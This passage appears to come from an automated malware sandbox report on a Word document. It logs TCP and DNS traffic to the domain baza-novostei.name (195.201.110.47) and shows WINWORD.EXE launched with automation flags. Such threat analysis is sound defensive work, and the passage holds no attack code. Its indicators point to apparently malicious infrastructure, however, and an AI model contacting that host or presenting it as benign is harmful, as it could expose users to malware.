        Jan 30, 2023 16:38:59.003942013 CET44349175195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.042727947 CET4917480192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.045788050 CET4917180192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.064165115 CET8049174195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.064320087 CET4917480192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.078620911 CET8049171195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.078855991 CET4917180192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.096642971 CET49176443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.096708059 CET44349176195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.096796036 CET49176443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.101285934 CET49176443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.101311922 CET44349176195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.152400017 CET44349176195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.152554035 CET49176443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.173438072 CET49176443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.173465014 CET44349176195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.173885107 CET44349176195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.173948050 CET49176443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.204113960 CET49176443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.204132080 CET44349176195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.237323046 CET44349176195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.237380981 CET44349176195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.237494946 CET44349176195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.237567902 CET49176443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.237596989 CET49176443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.239999056 CET49176443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.240031958 CET44349176195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.282567024 CET4917180192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.309516907 CET8049171195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.309597969 CET4917180192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.310352087 CET49177443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.310408115 CET44349177195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.310482979 CET49177443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.310832024 CET49177443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.310851097 CET44349177195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.363852024 CET44349177195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.363992929 CET49177443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.380295038 CET49177443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.380322933 CET44349177195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.382600069 CET49177443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.382625103 CET44349177195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.445380926 CET44349177195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.445483923 CET44349177195.201.110.47192.168.2.22

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        Jan 30, 2023 16:38:53.323796034 CET5586853192.168.2.228.8.8.8
        Jan 30, 2023 16:38:53.352087021 CET53558688.8.8.8192.168.2.22
        Jan 30, 2023 16:38:54.603615999 CET4968853192.168.2.228.8.8.8
        Jan 30, 2023 16:38:54.626416922 CET53496888.8.8.8192.168.2.22
        Jan 30, 2023 16:38:54.631133080 CET5883653192.168.2.228.8.8.8
        Jan 30, 2023 16:38:54.685975075 CET53588368.8.8.8192.168.2.22
        Jan 30, 2023 16:38:58.725426912 CET5013453192.168.2.228.8.8.8
        Jan 30, 2023 16:38:58.769660950 CET53501348.8.8.8192.168.2.22
        Jan 30, 2023 16:38:58.772041082 CET5527553192.168.2.228.8.8.8
        Jan 30, 2023 16:38:58.789683104 CET53552758.8.8.8192.168.2.22
        Jan 30, 2023 16:38:59.534842968 CET5991553192.168.2.228.8.8.8
        Jan 30, 2023 16:38:59.557145119 CET53599158.8.8.8192.168.2.22
        Jan 30, 2023 16:38:59.561460018 CET5440853192.168.2.228.8.8.8
        Jan 30, 2023 16:38:59.584151030 CET53544088.8.8.8192.168.2.22

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jan 30, 2023 16:38:53.323796034 CET192.168.2.228.8.8.80x271Standard query (0)baza-novostei.nameA (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:54.603615999 CET192.168.2.228.8.8.80x7509Standard query (0)baza-novostei.nameA (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:54.631133080 CET192.168.2.228.8.8.80xdc0Standard query (0)baza-novostei.nameA (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:58.725426912 CET192.168.2.228.8.8.80xf2caStandard query (0)baza-novostei.nameA (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:58.772041082 CET192.168.2.228.8.8.80xdc64Standard query (0)baza-novostei.nameA (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:59.534842968 CET192.168.2.228.8.8.80xd768Standard query (0)baza-novostei.nameA (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:59.561460018 CET192.168.2.228.8.8.80xe2abStandard query (0)baza-novostei.nameA (IP address)IN (0x0001)false

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Jan 30, 2023 16:38:53.352087021 CET8.8.8.8192.168.2.220x271No error (0)baza-novostei.name195.201.110.47A (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:54.626416922 CET8.8.8.8192.168.2.220x7509No error (0)baza-novostei.name195.201.110.47A (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:54.685975075 CET8.8.8.8192.168.2.220xdc0No error (0)baza-novostei.name195.201.110.47A (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:58.769660950 CET8.8.8.8192.168.2.220xf2caNo error (0)baza-novostei.name195.201.110.47A (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:58.789683104 CET8.8.8.8192.168.2.220xdc64No error (0)baza-novostei.name195.201.110.47A (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:59.557145119 CET8.8.8.8192.168.2.220xd768No error (0)baza-novostei.name195.201.110.47A (IP address)IN (0x0001)false
        Jan 30, 2023 16:38:59.584151030 CET8.8.8.8192.168.2.220xe2abNo error (0)baza-novostei.name195.201.110.47A (IP address)IN (0x0001)false

        HTTP Request Dependency Graph

        • baza-novostei.name

        Statistics

        No statistics

        System Behavior

        General

        Target ID:0
        Start time:16:38:13
        Start date:30/01/2023
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13fe30000
        File size:1423704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Disassembly

        No disassembly